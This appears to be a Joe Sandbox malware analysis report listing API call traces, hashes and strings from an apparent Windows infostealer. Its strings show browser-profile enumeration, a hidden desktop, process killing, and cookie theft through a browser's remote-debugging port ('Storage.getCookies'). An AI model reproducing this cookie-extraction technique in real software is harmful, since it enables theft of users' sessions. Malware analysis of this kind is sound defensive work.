                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: 8d34e544d9e0b94bd3347581c4330d9267c2cfed12fc27ba9838979cf7083695
                                • Instruction ID: 950965f7d1bacb0a19ec0573943d5fa6c254a7dffcc56dc6fe3b0afe3b99945d
                                • Opcode Fuzzy Hash: 8d34e544d9e0b94bd3347581c4330d9267c2cfed12fc27ba9838979cf7083695
                                • Instruction Fuzzy Hash: D7923171A11A019FDB26CF29C948B6AB7F5FF46314F1A80ADE809DB2A1D771DC41CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A12BF
                                • lstrlen.KERNEL32(003C4CA8), ref: 003A12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12E7
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A133A
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A135C
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1376
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A13E2
                                • lstrlen.KERNEL32(003C1794), ref: 003A13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A140A
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1416
                                • lstrlen.KERNEL32(?), ref: 003A1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1443
                                • lstrcat.KERNEL32(00000000,?), ref: 003A1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A147A
                                • StrCmpCA.SHLWAPI(?,00F7DE28), ref: 003A14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1535
                                • StrCmpCA.SHLWAPI(?,00F7E538), ref: 003A1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A15E4
                                • StrCmpCA.SHLWAPI(?,00F7DC78), ref: 003A1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1685
                                • StrCmpCA.SHLWAPI(?,00F7DDE0), ref: 003A16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003A181C
                                • FindClose.KERNEL32(00000000), ref: 003A182B
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: ac5e0573f032610b325092ac884bb234f726ca614dcc2591f1c09ce3f396bb62
                                • Instruction ID: 251854fb810a23b1faf6188276ca2a1b5de144d2c29b802d39a3a34c27dfe7e6
                                • Opcode Fuzzy Hash: ac5e0573f032610b325092ac884bb234f726ca614dcc2591f1c09ce3f396bb62
                                • Instruction Fuzzy Hash: 0C124771A11A069FCF26EF79D889AAF77B8EF55300F054528F846EB250DB34DC458B90
                                APIs
                                • wsprintfA.USER32 ref: 003ACBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 003ACC13
                                • lstrcat.KERNEL32(?,?), ref: 003ACC5F
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003ACC71
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003ACC8B
                                • wsprintfA.USER32 ref: 003ACCB0
                                • PathMatchSpecA.SHLWAPI(?,00F78AD8), ref: 003ACCE2
                                • CoInitialize.OLE32(00000000), ref: 003ACCEE
                                  • Part of subcall function 003ACAE0: CoCreateInstance.COMBASE(003BB110,00000000,00000001,003BB100,?), ref: 003ACB06
                                  • Part of subcall function 003ACAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003ACB46
                                  • Part of subcall function 003ACAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 003ACBC9
                                • CoUninitialize.COMBASE ref: 003ACD09
                                • lstrcat.KERNEL32(?,?), ref: 003ACD2E
                                • lstrlen.KERNEL32(?), ref: 003ACD3B
                                • StrCmpCA.SHLWAPI(?,003BCFEC), ref: 003ACD55
                                • wsprintfA.USER32 ref: 003ACD7D
                                • wsprintfA.USER32 ref: 003ACD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 003ACDB0
                                • wsprintfA.USER32 ref: 003ACDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 003ACDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 003ACE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 003ACE28
                                • CloseHandle.KERNEL32(00000000), ref: 003ACE33
                                • CloseHandle.KERNEL32(00000000), ref: 003ACE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003ACE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ACE94
                                • FindNextFileA.KERNEL32(?,?), ref: 003ACF8D
                                • FindClose.KERNEL32(?), ref: 003ACF9F
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: 4bb1ac1bf1a0a2275938d9814c1be12c296e7d629129b926851359d571956408
                                • Instruction ID: ef0cdadc3884e351876b06072639889d566110da531f0ad747449bbdd6c5bc5f
                                • Opcode Fuzzy Hash: 4bb1ac1bf1a0a2275938d9814c1be12c296e7d629129b926851359d571956408
                                • Instruction Fuzzy Hash: E9C14F72910619AFDB21DF64DC49EEE77B9EF55300F044598F50AA7280EE30AE58CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A12BF
                                • lstrlen.KERNEL32(003C4CA8), ref: 003A12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12E7
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A133A
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A135C
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1376
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A13E2
                                • lstrlen.KERNEL32(003C1794), ref: 003A13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A140A
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1416
                                • lstrlen.KERNEL32(?), ref: 003A1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1443
                                • lstrcat.KERNEL32(00000000,?), ref: 003A1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A147A
                                • StrCmpCA.SHLWAPI(?,00F7DE28), ref: 003A14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1535
                                • StrCmpCA.SHLWAPI(?,00F7E538), ref: 003A1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003A181C
                                • FindClose.KERNEL32(00000000), ref: 003A182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 339e4c0627378969132cc0eaddb4b910b70dc56a537cb27cc3bfa0b95799b2ec
                                • Instruction ID: 84a39a0fa13f5742a7b0d6bb731a93324820ae15bc7fa15749d24c09283f7299
                                • Opcode Fuzzy Hash: 339e4c0627378969132cc0eaddb4b910b70dc56a537cb27cc3bfa0b95799b2ec
                                • Instruction Fuzzy Hash: B4C15831A11A06AFCF22EF69DC89AAF77B8EF55300F054528F846AB251DB34DC55CB90
                                APIs
                                • memset.MSVCRT ref: 00399790
                                • lstrcat.KERNEL32(?,?), ref: 003997A0
                                • lstrcat.KERNEL32(?,?), ref: 003997B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003997C3
                                • memset.MSVCRT ref: 003997D7
                                  • Part of subcall function 003B3E70: lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B3EA5
                                  • Part of subcall function 003B3E70: lstrcpy.KERNEL32(00000000,00F7EEB0), ref: 003B3ECF
                                  • Part of subcall function 003B3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0039134E,?,0000001A), ref: 003B3ED9
                                • wsprintfA.USER32 ref: 00399806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00399827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00399844
                                  • Part of subcall function 003B46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003B46B9
                                  • Part of subcall function 003B46A0: Process32First.KERNEL32(00000000,00000128), ref: 003B46C9
                                  • Part of subcall function 003B46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003B46DB
                                  • Part of subcall function 003B46A0: StrCmpCA.SHLWAPI(?,?), ref: 003B46ED
                                  • Part of subcall function 003B46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B4702
                                  • Part of subcall function 003B46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003B4711
                                  • Part of subcall function 003B46A0: CloseHandle.KERNEL32(00000000), ref: 003B4718
                                  • Part of subcall function 003B46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003B4726
                                  • Part of subcall function 003B46A0: CloseHandle.KERNEL32(00000000), ref: 003B4731
                                • lstrcat.KERNEL32(00000000,?), ref: 00399878
                                • lstrcat.KERNEL32(00000000,?), ref: 00399889
                                • lstrcat.KERNEL32(00000000,003C4B60), ref: 0039989B
                                • memset.MSVCRT ref: 003998AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003998D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00399903
                                • StrStrA.SHLWAPI(00000000,00F7F580), ref: 00399919
                                • lstrcpyn.KERNEL32(005C93D0,00000000,00000000), ref: 00399938
                                • lstrlen.KERNEL32(?), ref: 0039994B
                                • wsprintfA.USER32 ref: 0039995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 00399971
                                • Sleep.KERNEL32(00001388), ref: 003999E7
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                  • Part of subcall function 003992B0: strlen.MSVCRT ref: 003992E1
                                  • Part of subcall function 003992B0: strlen.MSVCRT ref: 003992FA
                                  • Part of subcall function 003992B0: strlen.MSVCRT ref: 00399399
                                  • Part of subcall function 003992B0: strlen.MSVCRT ref: 003993E6
                                  • Part of subcall function 003B4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003B4759
                                  • Part of subcall function 003B4740: Process32First.KERNEL32(00000000,00000128), ref: 003B4769
                                  • Part of subcall function 003B4740: Process32Next.KERNEL32(00000000,00000128), ref: 003B477B
                                  • Part of subcall function 003B4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B479C
                                  • Part of subcall function 003B4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003B47AB
                                  • Part of subcall function 003B4740: CloseHandle.KERNEL32(00000000), ref: 003B47B2
                                  • Part of subcall function 003B4740: Process32Next.KERNEL32(00000000,00000128), ref: 003B47C0
                                  • Part of subcall function 003B4740: CloseHandle.KERNEL32(00000000), ref: 003B47CB
                                • CloseDesktop.USER32(?), ref: 00399A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 52c03c98c1dc8b1519f34dbe0304857cc5d63d5dcdeecc98a22164911b7674b1
                                • Instruction ID: fa322ac088527f109953041e436325e6ed04337dc7c24d974fabab924dd57d64
                                • Opcode Fuzzy Hash: 52c03c98c1dc8b1519f34dbe0304857cc5d63d5dcdeecc98a22164911b7674b1
                                • Instruction Fuzzy Hash: 48917371A10608AFDB11DFA4DC89FEE77B8AF58700F104599F609AB191DF70AE44CBA4
                                APIs
                                • wsprintfA.USER32 ref: 003AE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 003AE243
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003AE263
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003AE27D
                                • wsprintfA.USER32 ref: 003AE2A2
                                • StrCmpCA.SHLWAPI(?,003BCFEC), ref: 003AE2B4
                                • wsprintfA.USER32 ref: 003AE2D1
                                  • Part of subcall function 003AEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003AEE12
                                • wsprintfA.USER32 ref: 003AE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 003AE304
                                • lstrcat.KERNEL32(?,00F7FBD0), ref: 003AE335
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AE347
                                • lstrcat.KERNEL32(?,?), ref: 003AE358
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AE36A
                                • lstrcat.KERNEL32(?,?), ref: 003AE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 003AE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE422
                                • DeleteFileA.KERNEL32(?), ref: 003AE45C
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003AE49B
                                • FindClose.KERNEL32(00000000), ref: 003AE4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: b477eb4d27df300f30e8c963d56d5efd43f7d64a51edae028d3cae45ae68823d
                                • Instruction ID: d47c02043ee684123685ab22e3888cda0dfc47bcfebf2183f84dfea96460d211
                                • Opcode Fuzzy Hash: b477eb4d27df300f30e8c963d56d5efd43f7d64a51edae028d3cae45ae68823d
                                • Instruction Fuzzy Hash: C4814D72900619AFCB21EF64DC49EEF77B9FF58300F044998B51A97141DA35AA58CFA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003916E2
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039176C
                                • lstrcat.KERNEL32(00000000), ref: 00391776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003917A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 003918F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003918FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: c2650e485b5b0ae2d0a8356b58981ed0967ba615950bb3461d7e51c2fb748e1a
                                • Instruction ID: fa2c8c824928fd11d8788ef7c8f98f287e5ffb408b30e3c4b05aea1b7811302e
                                • Opcode Fuzzy Hash: c2650e485b5b0ae2d0a8356b58981ed0967ba615950bb3461d7e51c2fb748e1a
                                • Instruction Fuzzy Hash: 5B813031912A1BAFCF23EFA8D989EAF77B9AF14700F051124F805AB251DB309D15CB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003ADD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003ADD4C
                                • wsprintfA.USER32 ref: 003ADD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 003ADD79
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003ADD9C
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003ADDB6
                                • wsprintfA.USER32 ref: 003ADDD4
                                • DeleteFileA.KERNEL32(?), ref: 003ADE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 003ADDED
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                  • Part of subcall function 003AD980: memset.MSVCRT ref: 003AD9A1
                                  • Part of subcall function 003AD980: memset.MSVCRT ref: 003AD9B3
                                  • Part of subcall function 003AD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AD9DB
                                  • Part of subcall function 003AD980: lstrcpy.KERNEL32(00000000,?), ref: 003ADA0E
                                  • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00000000), ref: 003ADA1C
                                  • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00F7F3E8), ref: 003ADA36
                                  • Part of subcall function 003AD980: lstrcat.KERNEL32(?,?), ref: 003ADA4A
                                  • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00F7DDB0), ref: 003ADA5E
                                  • Part of subcall function 003AD980: lstrcpy.KERNEL32(00000000,?), ref: 003ADA8E
                                  • Part of subcall function 003AD980: GetFileAttributesA.KERNEL32(00000000), ref: 003ADA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003ADE2E
                                • FindClose.KERNEL32(00000000), ref: 003ADE3D
                                • lstrcat.KERNEL32(?,00F7FBD0), ref: 003ADE66
                                • lstrcat.KERNEL32(?,00F7E638), ref: 003ADE7A
                                • lstrlen.KERNEL32(?), ref: 003ADE84
                                • lstrlen.KERNEL32(?), ref: 003ADE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ADED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 990c210252e26c2293214c1ec2f90069b02456abb9d025d3dcd3c3261900f891
                                • Instruction ID: 5737fab87e288639b21e9913ed7c4f5dd0ff5b97deeecd36162b685fba19c784
                                • Opcode Fuzzy Hash: 990c210252e26c2293214c1ec2f90069b02456abb9d025d3dcd3c3261900f891
                                • Instruction Fuzzy Hash: 86614E72910609AFCB21EB64DC89EEE77B9FF58300F0045A8F546A7251DF34AA58DB90
                                APIs
                                • wsprintfA.USER32 ref: 003AD54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 003AD564
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003AD584
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003AD59E
                                • lstrcat.KERNEL32(?,00F7FBD0), ref: 003AD5E3
                                • lstrcat.KERNEL32(?,00F7FC60), ref: 003AD5F7
                                • lstrcat.KERNEL32(?,?), ref: 003AD60B
                                • lstrcat.KERNEL32(?,?), ref: 003AD61C
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AD62E
                                • lstrcat.KERNEL32(?,?), ref: 003AD642
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AD682
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AD6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003AD737
                                • FindClose.KERNEL32(00000000), ref: 003AD746
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: ca1b9e376f347caa494af468f97ff23b9ce58772bbd637ff55ccad693a95d6b3
                                • Instruction ID: 12755d3efac3abd4d4d37ebce8a4c408e732f629df63507a7111e641435574bc
                                • Opcode Fuzzy Hash: ca1b9e376f347caa494af468f97ff23b9ce58772bbd637ff55ccad693a95d6b3
                                • Instruction Fuzzy Hash: 47617371910519AFCF25EF74DC88EEE77B8EF59300F0044A8E54AA7251DB34AA58CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: 844c3a0b74644142bc43e96734da3b586a5f52b2675c47a07774abbfa9f12a03
                                • Instruction ID: cd75f3fb9b28344132ac1c0177d9001b40412858872dfef2940477774b9e3cee
                                • Opcode Fuzzy Hash: 844c3a0b74644142bc43e96734da3b586a5f52b2675c47a07774abbfa9f12a03
                                • Instruction Fuzzy Hash: C8A26A71E012699FDF21DFA8C8807EDBBB6BF48304F1485A9D609A7641DB705E85CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A2402
                                • lstrlen.KERNEL32(\*.*), ref: 003A240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 003A2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
